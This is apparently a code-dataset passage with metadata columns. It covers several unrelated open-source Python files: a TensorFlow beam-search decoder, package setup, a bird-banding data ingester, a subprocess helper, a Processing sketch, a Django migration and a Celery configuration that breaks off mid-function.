def decoding_loop(self) -> BeamSearchOutput:
"""Create the decoding loop.
This function mimics the behavior of the ``decoding_loop`` method of
the ``AutoregressiveDecoder``, except the initial loop state is created
outside this method because it is accessed and fed during ensembling.
TODO: The ``finalize_loop`` method and the handling of attention loop
states might be implemented in the future.
Returns:
This method returns a populated ``BeamSearchOutput`` object.
"""
final_loop_state = tf.while_loop(
self.loop_continue_criterion,
self.get_body(),
self.initial_loop_state,
shape_invariants=tf.contrib.framework.nest.map_structure(
get_state_shape_invariants, self.initial_loop_state))
# TODO: return att_loop_states properly
return BeamSearchOutput(
last_search_step_output=final_loop_state.search_results,
last_dec_loop_state=final_loop_state.decoder_loop_state,
last_search_state=final_loop_state.search_state,
attention_loop_states=[])
def get_body(self) -> Callable[[Any], BeamSearchLoopState]:
"""Return a body function for ``tf.while_loop``.
Returns:
A function that performs a single decoding step.
"""
decoder_body = self.parent_decoder.get_body(train_mode=False)
# pylint: disable=too-many-locals
def body(*args: Any) -> BeamSearchLoopState:
"""Execute a single beam search step.
An implementation of the beam search algorithm, which works as
follows:
1. Create a valid ``logprobs`` tensor which contains distributions
over the output tokens for each hypothesis in the beam. For
finished hypotheses, the log probabilities of all tokens except
the padding token are set to negative infinity.
2. Expand the beam by appending every possible token to every
existing hypothesis. Update the log probabilitiy sum of each
hypothesis and its length (add one for unfinished hypotheses).
For each hypothesis, compute the score using the length penalty
term.
3. Select the ``beam_size`` best hypotheses from the score pool.
This is implemented by flattening the scores tensor and using
the ``tf.nn.top_k`` function.
4. Reconstruct the beam by gathering elements from the original
data structures using the data indices computed in the previous
step.
5. Call the ``body`` function of the underlying decoder.
6. Populate a new ``BeamSearchLoopState`` object with the selected
values and with the newly obtained decoder loop state.
Note that this function expects the decoder to be called at least
once prior the first execution.
Arguments:
args: An instance of the ``BeamSearchLoopState`` structure.
(see the docs for this module)
Returns:
A ``BeamSearchLoopState`` after one step of the decoding.
"""
loop_state = BeamSearchLoopState(*args)
dec_loop_state = loop_state.decoder_loop_state
search_state = loop_state.search_state
search_results = loop_state.search_results
# mask the probabilities
# shape(logprobs) = [batch, beam, vocabulary]
logprobs = search_state.prev_logprobs
finished_mask = tf.expand_dims(
tf.to_float(search_state.finished), 2)
unfinished_logprobs = (1. - finished_mask) * logprobs
finished_row = tf.one_hot(
PAD_TOKEN_INDEX,
len(self.vocabulary),
dtype=tf.float32,
on_value=0.,
off_value=-INF)
finished_logprobs = finished_mask * finished_row
logprobs = unfinished_logprobs + finished_logprobs
# update hypothesis scores
# shape(hyp_probs) = [batch, beam, vocabulary]
hyp_probs = tf.expand_dims(search_state.logprob_sum, 2) + logprobs
# update hypothesis lengths
hyp_lengths = search_state.lengths + 1 - tf.to_int32(
search_state.finished)
# shape(scores) = [batch, beam, vocabulary]
scores = hyp_probs / tf.expand_dims(
self._length_penalty(hyp_lengths), 2)
# reshape to [batch, beam * vocabulary] for topk
scores_flat = tf.reshape(
scores, [-1, self.beam_size * len(self.vocabulary)])
# shape(both) = [batch, beam]
topk_scores, topk_indices = tf.nn.top_k(
scores_flat, k=self.beam_size)
topk_indices.set_shape([None, self.beam_size])
topk_scores.set_shape([None, self.beam_size])
next_word_ids = tf.mod(topk_indices, len(self.vocabulary))
next_beam_ids = tf.div(topk_indices, len(self.vocabulary))
# batch offset for tf.gather_nd
batch_offset = tf.tile(
tf.expand_dims(tf.range(self.batch_size), 1),
[1, self.beam_size])
batch_beam_ids = tf.stack([batch_offset, next_beam_ids], axis=2)
# gather the topk logprob_sums
next_beam_lengths = tf.gather_nd(hyp_lengths, batch_beam_ids)
next_beam_logprob_sum = tf.gather_nd(
tf.reshape(
hyp_probs, [-1, self.beam_size * len(self.vocabulary)]),
tf.stack([batch_offset, topk_indices], axis=2))
# mark finished beams
next_finished = tf.gather_nd(search_state.finished, batch_beam_ids)
next_just_finished = tf.equal(next_word_ids, END_TOKEN_INDEX)
next_finished = tf.logical_or(next_finished, next_just_finished)
# we need to flatten the feedables for the parent_decoder
next_feedables = tf.contrib.framework.nest.map_structure(
lambda x: gather_flat(x, batch_beam_ids,
self.batch_size, self.beam_size),
dec_loop_state.feedables)
next_feedables = next_feedables._replace(
input_symbol=tf.reshape(next_word_ids, [-1]),
finished=tf.reshape(next_finished, [-1]))
# histories have shape [len, batch, ...]
def gather_fn(x):
return partial_transpose(
gather_flat(
partial_transpose(x, [1, 0]),
batch_beam_ids,
self.batch_size,
self.beam_size),
[1, 0])
next_histories = tf.contrib.framework.nest.map_structure(
gather_fn, dec_loop_state.histories)
dec_loop_state = dec_loop_state._replace(
feedables=next_feedables,
histories=next_histories)
# CALL THE DECODER BODY FUNCTION
next_loop_state = decoder_body(*dec_loop_state)
next_search_state = SearchState(
logprob_sum=next_beam_logprob_sum,
prev_logprobs=tf.reshape(
tf.nn.log_softmax(next_loop_state.feedables.prev_logits),
[self.batch_size, self.beam_size, len(self.vocabulary)]),
lengths=next_beam_lengths,
finished=next_finished)
next_token_ids = tf.transpose(search_results.token_ids, [1, 2, 0])
next_token_ids = tf.gather_nd(next_token_ids, batch_beam_ids)
next_token_ids = tf.transpose(next_token_ids, [2, 0, 1])
next_output = SearchResults(
scores=topk_scores,
token_ids=append_tensor(next_token_ids, next_word_ids))
return BeamSearchLoopState(
search_state=next_search_state,
search_results=next_output,
decoder_loop_state=next_loop_state)
# pylint: enable=too-many-locals
return body
def _length_penalty(self, lengths: tf.Tensor) -> tf.Tensor:
"""Apply length penalty ("lp") term from Eq. 14.
https://arxiv.org/pdf/1609.08144.pdf
Arguments:
lengths: A ``Tensor`` of lengths of the hypotheses in the beam.
Returns:
A float ``Tensor`` with the length penalties for each hypothesis
in the beam.
"""
return ((5. + tf.to_float(lengths)) / 6.) ** self.length_normalization
def expand_to_beam(self, val: tf.Tensor, dim: int = 0) -> tf.Tensor:
"""Copy a tensor along a new beam dimension.
Arguments:
val: The ``Tensor`` to expand.
dim: The dimension along which to expand. Usually, the batch axis.
Returns:
The expanded tensor.
"""
orig_shape = get_shape_list(val)
if val.shape.ndims == 0:
return val
orig_shape[dim] *= self.beam_size
tile_shape = [1] * (len(orig_shape) + 1)
tile_shape[dim + 1] = self.beam_size
val = tf.tile(tf.expand_dims(val, 1), tile_shape)
val = tf.reshape(val, orig_shape)
return val | pt | 0.200339 | 2.831749 | 3 |
setup.py | CBDRH/cdeid | 0 | 13575 | <gh_stars>0
from setuptools import setup, find_packages
with open('README.md', "r") as f:
readme = f.read()
with open('LICENSE') as f:
license_content = f.read()
setup(
name='cdeid',
version='0.1.2',
author='<NAME>',
author_email='<EMAIL>',
description='A Customized De-identification framework',
long_description_content_type='text/markdown',
long_description=readme,
url='https://github.com/CBDRH/cdeid',
keywords=['DE-IDENTIFICATION', 'NLP'],
install_requires=[
'spaCy>=2.3.2',
'stanza>=1.1.1',
'flair==0.8',
'mako>=1.1.3'
],
packages=find_packages(exclude=('tests', 'docs')),
classifiers=[
'Development Status :: 3 - Alpha',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
],
python_requires='>=3.7'
)
| from setuptools import setup, find_packages
with open('README.md', "r") as f:
readme = f.read()
with open('LICENSE') as f:
license_content = f.read()
setup(
name='cdeid',
version='0.1.2',
author='<NAME>',
author_email='<EMAIL>',
description='A Customized De-identification framework',
long_description_content_type='text/markdown',
long_description=readme,
url='https://github.com/CBDRH/cdeid',
keywords=['DE-IDENTIFICATION', 'NLP'],
install_requires=[
'spaCy>=2.3.2',
'stanza>=1.1.1',
'flair==0.8',
'mako>=1.1.3'
],
packages=find_packages(exclude=('tests', 'docs')),
classifiers=[
'Development Status :: 3 - Alpha',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
],
python_requires='>=3.7'
) | none | 1 | 1.329053 | 1 |
pylib/bbl_ingest.py | rafelafrance/sightings-database | 4 | 13576 | """Ingest USGS Bird Banding Laboratory data."""
from pathlib import Path
import pandas as pd
from . import db, util
DATASET_ID = 'bbl'
RAW_DIR = Path('data') / 'raw' / DATASET_ID
BANDING = RAW_DIR / 'Banding'
ENCOUNTERS = RAW_DIR / 'Encounters'
RECAPTURES = RAW_DIR / 'Recaptures'
SPECIES = RAW_DIR / 'species.html'
ONE_MIN = 111.32 * 1000
TEN_MIN = 111.32 * 1000 * 10
EXACT = 0
def ingest():
"""Ingest USGS Bird Banding Laboratory data."""
db.delete_dataset_records(DATASET_ID)
to_taxon_id = get_taxa()
db.insert_dataset({
'dataset_id': DATASET_ID,
'title': 'Bird Banding Laboratory (BBL)',
'version': '2020.0',
'url': ('https://www.usgs.gov/centers/pwrc/science/'
'bird-banding-laboratory')})
to_place_id = {}
to_place_id = insert_banding_data(to_place_id, to_taxon_id)
to_place_id = insert_encounter_data(
ENCOUNTERS, to_place_id, to_taxon_id, 'encounter')
insert_encounter_data(RECAPTURES, to_place_id, to_taxon_id, 'recapture')
def get_taxa():
"""Build a taxa table to link to our taxa."""
codes = pd.read_html(str(SPECIES))[0]
codes = codes.rename(columns={
'Scientific Name': 'sci_name',
'Species Number': 'species_id'})
codes = codes[codes['sci_name'].notna()]
codes = codes.set_index('sci_name')['species_id'].to_dict()
sql = """SELECT taxon_id, sci_name FROM taxa WHERE "class"='aves';"""
taxa = pd.read_sql(sql, db.connect())
taxa = taxa.set_index('sci_name')['taxon_id'].to_dict()
to_taxon_id = {str(v).zfill(4): i for k, v in codes.items()
if (i := taxa.get(k))}
return to_taxon_id
def insert_banding_data(to_place_id, to_taxon_id):
"""Insert raw banding data."""
util.log(f'Inserting {DATASET_ID} banding data')
for path in sorted(BANDING.glob('*.csv')):
util.log(f'File {path}')
df = read_csv(
path, 'LON_DECIMAL_DEGREES', 'LAT_DECIMAL_DEGREES', 'banding')
df = filter_data(
df, to_taxon_id, 'BANDING_DATE', 'SPECIES_ID', 'COORD_PRECISION')
to_place_id = insert_places(df, to_place_id, 'COORD_PRECISION')
event_json = """ BAND_NUM BANDING_DATE TYPE """.split()
insert_events(df, event_json)
count_json = """
AGE_CODE SEX_CODE SPECIES_ID SPECIES_NAME TYPE """.split()
insert_counts(df, count_json)
return to_place_id
def insert_encounter_data(dir_, to_place_id, to_taxon_id, type_):
"""Insert raw encounter and recapture data."""
util.log(f'Inserting {DATASET_ID} {type_} data')
for path in sorted(dir_.glob('*.csv')):
util.log(f'File {path}')
df = read_csv(
path, 'E_LON_DECIMAL_DEGREES', 'E_LAT_DECIMAL_DEGREES', type_)
df = filter_data(
df, to_taxon_id,
'ENCOUNTER_DATE', 'B_SPECIES_ID', 'E_COORD_PRECISION')
to_place_id = insert_places(df, to_place_id, 'E_COORD_PRECISION')
event_json = """ BAND_NUM ENCOUNTER_DATE TYPE """.split()
insert_events(df, event_json)
count_json = """
B_AGE_CODE B_SEX_CODE B_SPECIES_ID B_SPECIES_NAME MIN_AGE_AT_ENC
ORIGINAL_BAND TYPE """.split()
insert_counts(df, count_json)
return to_place_id
def read_csv(path, lng, lat, type_):
"""Read in a CSV file."""
df = pd.read_csv(path, dtype='unicode').fillna('')
util.normalize_columns_names(df)
df = df.rename(columns={lng: 'lng', lat: 'lat'})
df['TYPE'] = type_
df['dataset_id'] = DATASET_ID
return df
def filter_data(df, to_taxon_id, event_date, species_id, coord_precision):
"""Remove records that will not work for our analysis."""
df['date'] = pd.to_datetime(df[event_date], errors='coerce')
has_date = df['date'].notna()
# Check if the scientific name is in our database
df['taxon_id'] = df[species_id].map(to_taxon_id)
has_taxon_id = df['taxon_id'].notna()
# Country and state are too big of an area
too_big = df[coord_precision].isin(['12', '72'])
df = df.loc[~too_big & has_taxon_id & has_date]
return df
def insert_places(df, to_place_id, coord_precision):
"""Insert place records."""
util.filter_lng_lat(df, 'lng', 'lat')
df['radius'] = TEN_MIN
df.loc[df[coord_precision] == '0', 'radius'] = EXACT
df.loc[df[coord_precision].isin(['1', '60']), 'radius'] = ONE_MIN
df['place_key'] = tuple(zip(df.lng, df.lat, df.radius))
places = df.drop_duplicates('place_key')
old_places = places['place_key'].isin(to_place_id)
places = places[~old_places]
places['place_id'] = db.create_ids(places, 'places')
places['place_json'] = util.json_object(places, [coord_precision])
places.loc[:, db.PLACE_FIELDS].to_sql(
'places', db.connect(), if_exists='append', index=False)
new_place_ids = places.set_index('place_key')['place_id'].to_dict()
to_place_id = {**to_place_id, **new_place_ids}
df['place_id'] = df['place_key'].map(to_place_id)
return to_place_id
def insert_events(df, event_json):
"""Insert event records."""
df['event_id'] = db.create_ids(df, 'events')
df['year'] = df['date'].dt.strftime('%Y')
df['day'] = df['date'].dt.strftime('%j')
df['started'] = None
df['ended'] = None
df['event_json'] = util.json_object(df, event_json)
df.loc[:, db.EVENT_FIELDS].to_sql(
'events', db.connect(), if_exists='append', index=False)
def insert_counts(df, count_json):
"""Insert count records."""
df['count_id'] = db.create_ids(df, 'counts')
df['count'] = 1
df['count_json'] = util.json_object(df, count_json)
df.loc[:, db.COUNT_FIELDS].to_sql(
'counts', db.connect(), if_exists='append', index=False)
if __name__ == '__main__':
ingest()
| """Ingest USGS Bird Banding Laboratory data."""
from pathlib import Path
import pandas as pd
from . import db, util
DATASET_ID = 'bbl'
RAW_DIR = Path('data') / 'raw' / DATASET_ID
BANDING = RAW_DIR / 'Banding'
ENCOUNTERS = RAW_DIR / 'Encounters'
RECAPTURES = RAW_DIR / 'Recaptures'
SPECIES = RAW_DIR / 'species.html'
ONE_MIN = 111.32 * 1000
TEN_MIN = 111.32 * 1000 * 10
EXACT = 0
def ingest():
"""Ingest USGS Bird Banding Laboratory data."""
db.delete_dataset_records(DATASET_ID)
to_taxon_id = get_taxa()
db.insert_dataset({
'dataset_id': DATASET_ID,
'title': 'Bird Banding Laboratory (BBL)',
'version': '2020.0',
'url': ('https://www.usgs.gov/centers/pwrc/science/'
'bird-banding-laboratory')})
to_place_id = {}
to_place_id = insert_banding_data(to_place_id, to_taxon_id)
to_place_id = insert_encounter_data(
ENCOUNTERS, to_place_id, to_taxon_id, 'encounter')
insert_encounter_data(RECAPTURES, to_place_id, to_taxon_id, 'recapture')
def get_taxa():
"""Build a taxa table to link to our taxa."""
codes = pd.read_html(str(SPECIES))[0]
codes = codes.rename(columns={
'Scientific Name': 'sci_name',
'Species Number': 'species_id'})
codes = codes[codes['sci_name'].notna()]
codes = codes.set_index('sci_name')['species_id'].to_dict()
sql = """SELECT taxon_id, sci_name FROM taxa WHERE "class"='aves';"""
taxa = pd.read_sql(sql, db.connect())
taxa = taxa.set_index('sci_name')['taxon_id'].to_dict()
to_taxon_id = {str(v).zfill(4): i for k, v in codes.items()
if (i := taxa.get(k))}
return to_taxon_id
def insert_banding_data(to_place_id, to_taxon_id):
"""Insert raw banding data."""
util.log(f'Inserting {DATASET_ID} banding data')
for path in sorted(BANDING.glob('*.csv')):
util.log(f'File {path}')
df = read_csv(
path, 'LON_DECIMAL_DEGREES', 'LAT_DECIMAL_DEGREES', 'banding')
df = filter_data(
df, to_taxon_id, 'BANDING_DATE', 'SPECIES_ID', 'COORD_PRECISION')
to_place_id = insert_places(df, to_place_id, 'COORD_PRECISION')
event_json = """ BAND_NUM BANDING_DATE TYPE """.split()
insert_events(df, event_json)
count_json = """
AGE_CODE SEX_CODE SPECIES_ID SPECIES_NAME TYPE """.split()
insert_counts(df, count_json)
return to_place_id
def insert_encounter_data(dir_, to_place_id, to_taxon_id, type_):
"""Insert raw encounter and recapture data."""
util.log(f'Inserting {DATASET_ID} {type_} data')
for path in sorted(dir_.glob('*.csv')):
util.log(f'File {path}')
df = read_csv(
path, 'E_LON_DECIMAL_DEGREES', 'E_LAT_DECIMAL_DEGREES', type_)
df = filter_data(
df, to_taxon_id,
'ENCOUNTER_DATE', 'B_SPECIES_ID', 'E_COORD_PRECISION')
to_place_id = insert_places(df, to_place_id, 'E_COORD_PRECISION')
event_json = """ BAND_NUM ENCOUNTER_DATE TYPE """.split()
insert_events(df, event_json)
count_json = """
B_AGE_CODE B_SEX_CODE B_SPECIES_ID B_SPECIES_NAME MIN_AGE_AT_ENC
ORIGINAL_BAND TYPE """.split()
insert_counts(df, count_json)
return to_place_id
def read_csv(path, lng, lat, type_):
"""Read in a CSV file."""
df = pd.read_csv(path, dtype='unicode').fillna('')
util.normalize_columns_names(df)
df = df.rename(columns={lng: 'lng', lat: 'lat'})
df['TYPE'] = type_
df['dataset_id'] = DATASET_ID
return df
def filter_data(df, to_taxon_id, event_date, species_id, coord_precision):
"""Remove records that will not work for our analysis."""
df['date'] = pd.to_datetime(df[event_date], errors='coerce')
has_date = df['date'].notna()
# Check if the scientific name is in our database
df['taxon_id'] = df[species_id].map(to_taxon_id)
has_taxon_id = df['taxon_id'].notna()
# Country and state are too big of an area
too_big = df[coord_precision].isin(['12', '72'])
df = df.loc[~too_big & has_taxon_id & has_date]
return df
def insert_places(df, to_place_id, coord_precision):
"""Insert place records."""
util.filter_lng_lat(df, 'lng', 'lat')
df['radius'] = TEN_MIN
df.loc[df[coord_precision] == '0', 'radius'] = EXACT
df.loc[df[coord_precision].isin(['1', '60']), 'radius'] = ONE_MIN
df['place_key'] = tuple(zip(df.lng, df.lat, df.radius))
places = df.drop_duplicates('place_key')
old_places = places['place_key'].isin(to_place_id)
places = places[~old_places]
places['place_id'] = db.create_ids(places, 'places')
places['place_json'] = util.json_object(places, [coord_precision])
places.loc[:, db.PLACE_FIELDS].to_sql(
'places', db.connect(), if_exists='append', index=False)
new_place_ids = places.set_index('place_key')['place_id'].to_dict()
to_place_id = {**to_place_id, **new_place_ids}
df['place_id'] = df['place_key'].map(to_place_id)
return to_place_id
def insert_events(df, event_json):
"""Insert event records."""
df['event_id'] = db.create_ids(df, 'events')
df['year'] = df['date'].dt.strftime('%Y')
df['day'] = df['date'].dt.strftime('%j')
df['started'] = None
df['ended'] = None
df['event_json'] = util.json_object(df, event_json)
df.loc[:, db.EVENT_FIELDS].to_sql(
'events', db.connect(), if_exists='append', index=False)
def insert_counts(df, count_json):
"""Insert count records."""
df['count_id'] = db.create_ids(df, 'counts')
df['count'] = 1
df['count_json'] = util.json_object(df, count_json)
df.loc[:, db.COUNT_FIELDS].to_sql(
'counts', db.connect(), if_exists='append', index=False)
if __name__ == '__main__':
ingest()
| en | 0.303969 | 2.750606 | 3 |
pyhdtoolkit/utils/cmdline.py | fsoubelet/PyhDToolk | 5 | 13577 | <reponame>fsoubelet/PyhDToolk<filename>pyhdtoolkit/utils/cmdline.py
"""
Module utils.cmdline
--------------------
Created on 2019.11.06
:author: <NAME> (<EMAIL>)
Utility script to help run commands and access the commandline.
"""
import errno
import os
import signal
import subprocess
from typing import Mapping, Optional, Tuple
from loguru import logger
from pyhdtoolkit.utils.contexts import timeit
class CommandLine:
"""
A high-level object to encapsulate the different methods for interacting with the commandline.
"""
@staticmethod
def check_pid_exists(pid: int) -> bool:
"""
Check whether the given PID exists in the current process table.
Args:
pid (int): the Process ID you want to check.
Returns:
A boolean stating the result.
"""
if pid == 0:
# According to "man 2 kill", PID 0 refers to <<every process in the process group of
# the calling process>>. Best not to go any further.
logger.warning("PID 0 refers to 'every process in calling processes', and should be untouched")
return True
try:
# Sending SIG 0 only checks if process has terminated, we're not actually terminating it
os.kill(pid, 0)
except OSError as pid_checkout_error:
if pid_checkout_error.errno == errno.ESRCH: # ERROR "No such process"
return False
if (
pid_checkout_error.errno == errno.EPERM
): # ERROR "Operation not permitted" -> there's a process to deny access to.
return True
# According to "man 2 kill" possible error values are (EINVAL, EPERM, ESRCH), therefore
# we should never get here. If so let's be explicit in considering this an error.
logger.exception("Could not figure out the provided PID for some reason")
raise
return True
@staticmethod
def run(
command: str, shell: bool = True, env: Mapping = None, timeout: float = None
) -> Tuple[Optional[int], bytes]:
"""
Run command based on `subprocess.Popen` and return the tuple of `(returncode, stdout)`.
Note that `stderr` is redirected to `stdout`. `shell` is same to parameter of `Popen`.
If the process does not terminate after `timeout` seconds, a `TimeoutExpired` exception
will be raised.
Args:
command (str): string, the command you want to run.
shell (bool): same as `Popen` argument. Setting the shell argument to a true value
causes subprocess to spawn an intermediate shell process, and tell it to run the
command. In other words, using an intermediate shell means that variables, glob
patterns, and other special shell features in the command string are processed
before the command is ran. Defaults to True.
env (Mapping): mapping that defines the environment variables for the new process.
timeout (float): same as `Popen.communicate` argument, number of seconds to wait for a
response before raising a TimeoutExpired exception.
Returns:
The tuple of (returncode, stdout). Beware, the stdout will be a byte array (id est
b'some returned text'). This output, returned as stdout, needs to be decoded properly
before you do anything with it, especially if you intend to log it into a file. While
it will most likely be 'utf-8', the encoding can vary from system to system so the
standard output is returned in bytes format and should be decoded later on.
Usage:
CommandLine.run('echo hello') -> (0, b'hello\r\n')
modified_env = os.environ.copy()
modified_env['ENV_VAR'] = new_value
CommandLine.run('echo $ENV_VAR', env=modified_env) -> (0, b'new_value')
"""
with timeit(
lambda spanned: logger.info(f"Ran command '{command}' in a subprocess, in: {spanned:.4f} seconds")
):
process = subprocess.Popen(
command, shell=shell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env
)
stdout, _ = process.communicate(timeout=timeout)
if process.poll() != 0:
logger.warning(f"Subprocess command '{command}' finished with exit code: {process.poll()}")
else:
logger.success(f"Subprocess command '{command}' finished with exit code: {process.poll()}")
return process.poll(), stdout
@staticmethod
def terminate(pid: int) -> bool:
"""
Terminate process by given pid. On Other platforms, using os.kill with signal.SIGTERM
to kill.
Args:
pid (int): the process ID to kill.
Returns:
A boolean stating the success of the operation.
"""
if CommandLine.check_pid_exists(pid):
os.kill(pid, signal.SIGTERM)
logger.debug(f"Process {pid} has successfully been terminated.")
return True
logger.error(f"Process with ID {pid} could not be terminated.")
return False
| """
Module utils.cmdline
--------------------
Created on 2019.11.06
:author: <NAME> (<EMAIL>)
Utility script to help run commands and access the commandline.
"""
import errno
import os
import signal
import subprocess
from typing import Mapping, Optional, Tuple
from loguru import logger
from pyhdtoolkit.utils.contexts import timeit
class CommandLine:
"""
A high-level object to encapsulate the different methods for interacting with the commandline.
"""
@staticmethod
def check_pid_exists(pid: int) -> bool:
"""
Check whether the given PID exists in the current process table.
Args:
pid (int): the Process ID you want to check.
Returns:
A boolean stating the result.
"""
if pid == 0:
# According to "man 2 kill", PID 0 refers to <<every process in the process group of
# the calling process>>. Best not to go any further.
logger.warning("PID 0 refers to 'every process in calling processes', and should be untouched")
return True
try:
# Sending SIG 0 only checks if process has terminated, we're not actually terminating it
os.kill(pid, 0)
except OSError as pid_checkout_error:
if pid_checkout_error.errno == errno.ESRCH: # ERROR "No such process"
return False
if (
pid_checkout_error.errno == errno.EPERM
): # ERROR "Operation not permitted" -> there's a process to deny access to.
return True
# According to "man 2 kill" possible error values are (EINVAL, EPERM, ESRCH), therefore
# we should never get here. If so let's be explicit in considering this an error.
logger.exception("Could not figure out the provided PID for some reason")
raise
return True
@staticmethod
def run(
command: str, shell: bool = True, env: Mapping = None, timeout: float = None
) -> Tuple[Optional[int], bytes]:
"""
Run command based on `subprocess.Popen` and return the tuple of `(returncode, stdout)`.
Note that `stderr` is redirected to `stdout`. `shell` is same to parameter of `Popen`.
If the process does not terminate after `timeout` seconds, a `TimeoutExpired` exception
will be raised.
Args:
command (str): string, the command you want to run.
shell (bool): same as `Popen` argument. Setting the shell argument to a true value
causes subprocess to spawn an intermediate shell process, and tell it to run the
command. In other words, using an intermediate shell means that variables, glob
patterns, and other special shell features in the command string are processed
before the command is ran. Defaults to True.
env (Mapping): mapping that defines the environment variables for the new process.
timeout (float): same as `Popen.communicate` argument, number of seconds to wait for a
response before raising a TimeoutExpired exception.
Returns:
The tuple of (returncode, stdout). Beware, the stdout will be a byte array (id est
b'some returned text'). This output, returned as stdout, needs to be decoded properly
before you do anything with it, especially if you intend to log it into a file. While
it will most likely be 'utf-8', the encoding can vary from system to system so the
standard output is returned in bytes format and should be decoded later on.
Usage:
CommandLine.run('echo hello') -> (0, b'hello\r\n')
modified_env = os.environ.copy()
modified_env['ENV_VAR'] = new_value
CommandLine.run('echo $ENV_VAR', env=modified_env) -> (0, b'new_value')
"""
with timeit(
lambda spanned: logger.info(f"Ran command '{command}' in a subprocess, in: {spanned:.4f} seconds")
):
process = subprocess.Popen(
command, shell=shell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env
)
stdout, _ = process.communicate(timeout=timeout)
if process.poll() != 0:
logger.warning(f"Subprocess command '{command}' finished with exit code: {process.poll()}")
else:
logger.success(f"Subprocess command '{command}' finished with exit code: {process.poll()}")
return process.poll(), stdout
@staticmethod
def terminate(pid: int) -> bool:
"""
Terminate process by given pid. On Other platforms, using os.kill with signal.SIGTERM
to kill.
Args:
pid (int): the process ID to kill.
Returns:
A boolean stating the success of the operation.
"""
if CommandLine.check_pid_exists(pid):
os.kill(pid, signal.SIGTERM)
logger.debug(f"Process {pid} has successfully been terminated.")
return True
logger.error(f"Process with ID {pid} could not be terminated.")
return False | pt | 0.189348 | 2.357865 | 2 |
sketches/noll/noll.pyde | kantel/processingpy | 4 | 13578 | <reponame>kantel/processingpy
from random import randint
margin = 5
def setup():
size(400, 600)
this.surface.setTitle("Re-Enactment A. <NAME>")
noLoop()
def draw():
background(235, 215, 182)
strokeWeight(2)
x1 = randint(margin, width - margin)
y1 = randint(margin, height - margin)
for _ in range(50):
x2 = randint(margin, width - margin)
y2 = randint(margin, height - margin)
line(x1, y1, x1, y2)
line(x1, y2, x2, y2)
x1 = x2
y1 = y2
| from random import randint
margin = 5
def setup():
size(400, 600)
this.surface.setTitle("Re-Enactment A. <NAME>")
noLoop()
def draw():
background(235, 215, 182)
strokeWeight(2)
x1 = randint(margin, width - margin)
y1 = randint(margin, height - margin)
for _ in range(50):
x2 = randint(margin, width - margin)
y2 = randint(margin, height - margin)
line(x1, y1, x1, y2)
line(x1, y2, x2, y2)
x1 = x2
y1 = y2 | none | 1 | 3.114446 | 3 |
minimalist_cms/cms_content/migrations/0004_auto_20190719_1242.py | wullerot/django-minimalist-cms | 0 | 13579 | # Generated by Django 2.1.10 on 2019-07-19 12:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('cms_content', '0003_auto_20190719_1232'),
]
operations = [
migrations.AlterModelOptions(
name='element',
options={'ordering': ['position'], 'verbose_name': 'Element', 'verbose_name_plural': 'Element'},
),
migrations.AddField(
model_name='container',
name='content_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType', verbose_name='Content type'),
),
migrations.AddField(
model_name='container',
name='object_id',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Object ID'),
),
]
| # Generated by Django 2.1.10 on 2019-07-19 12:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('cms_content', '0003_auto_20190719_1232'),
]
operations = [
migrations.AlterModelOptions(
name='element',
options={'ordering': ['position'], 'verbose_name': 'Element', 'verbose_name_plural': 'Element'},
),
migrations.AddField(
model_name='container',
name='content_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType', verbose_name='Content type'),
),
migrations.AddField(
model_name='container',
name='object_id',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Object ID'),
),
]
| es | 0.128841 | 1.593518 | 2 |
original-paas/copy_to_container/www/spdpaas/src/celeryApp/celeryConfig.py | yishan1331/docker-practice | 0 | 13580 | # -*- coding: utf-8 -*-
"""
==============================================================================
created : 02/08/2021
Last update: 02/08/2021
Developer: <NAME>
Lite Version 1 @Yishan08032019
Filename: celeryconfig.py
Description: about celery configuration
==============================================================================
"""
from kombu import Queue
class BaseConfig(object):
CELERY_ACCEPT_CONTENT= ['json']
CELERY_TASK_SERIALIZER= 'json'
CELERY_RESULT_SERIALIZER= 'json'
CELERY_ENABLE_UTC=True
CELERY_TIMEZONE='Asia/Taipei'
# CELERY_ACKS_LATE=True, #https://kknews.cc/zh-tw/code/5v5vj52.html
CELERYD_PREFETCH_MULTIPLIER=1
CELERYD_MAX_TASKS_PER_CHILD=50 #memory leak
CELERY_IGNORE_RESULT=True
CELERY_STORE_ERRORS_EVEN_IF_IGNORED=True
CELERY_TASK_CREATE_MISSING_QUEUES=False
CELERY_QUEUES = {
# Queue("default", routing_key = "default"),
# Queue("queue1", routing_key = "high", queue_arguments={'maxPriority': 10}), #https://github.com/squaremo/amqp.node/issues/165
Queue("H-queue1", routing_key = "high"),
Queue("L-queue1", routing_key = "low")
}
CELERY_TASK_ROUTES = {
'celeryApp.celeryTasks.celery_trigger_specific_program': {'queue': 'H-queue1','routing_key':'high'},
'celeryApp.celeryTasks.celery_post_api_count_record': {'queue': 'L-queue1','routing_key':'low'},
'celeryApp.celeryTasks.celery_send_email': {'queue': 'L-queue1','routing_key':'low'},
}
def readConfig():
import os, time
import ConfigParser
from app.globalvar import CONFIG as _CONFIG
try:
get_request_start_time = int(round(time.time()* 1000000))
if not os.path.isfile('/var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))):
with os.popen('/usr/bin/openssl enc -aes-128-cbc -d -in /var/www/spdpaas/config/encconstants.conf -out /var/www/spdpaas/config/deconstants_{}.conf -pass <PASSWORD>:<PASSWORD>'.format(str(get_request_start_time))) as osdecrypt:
osdecrypt.read()
CONFPATH = "/var/www/spdpaas/config/deconstants_{}.conf".format(str(get_request_start_time))
CONFIG = ConfigParser.ConfigParser()
CONFIG.read(CONFPATH)
dicConfig = {
"celery_broker":CONFIG.get('Celery', 'broker'),
"celery_result_backend":CONFIG.get('Celery', 'result_backend'),
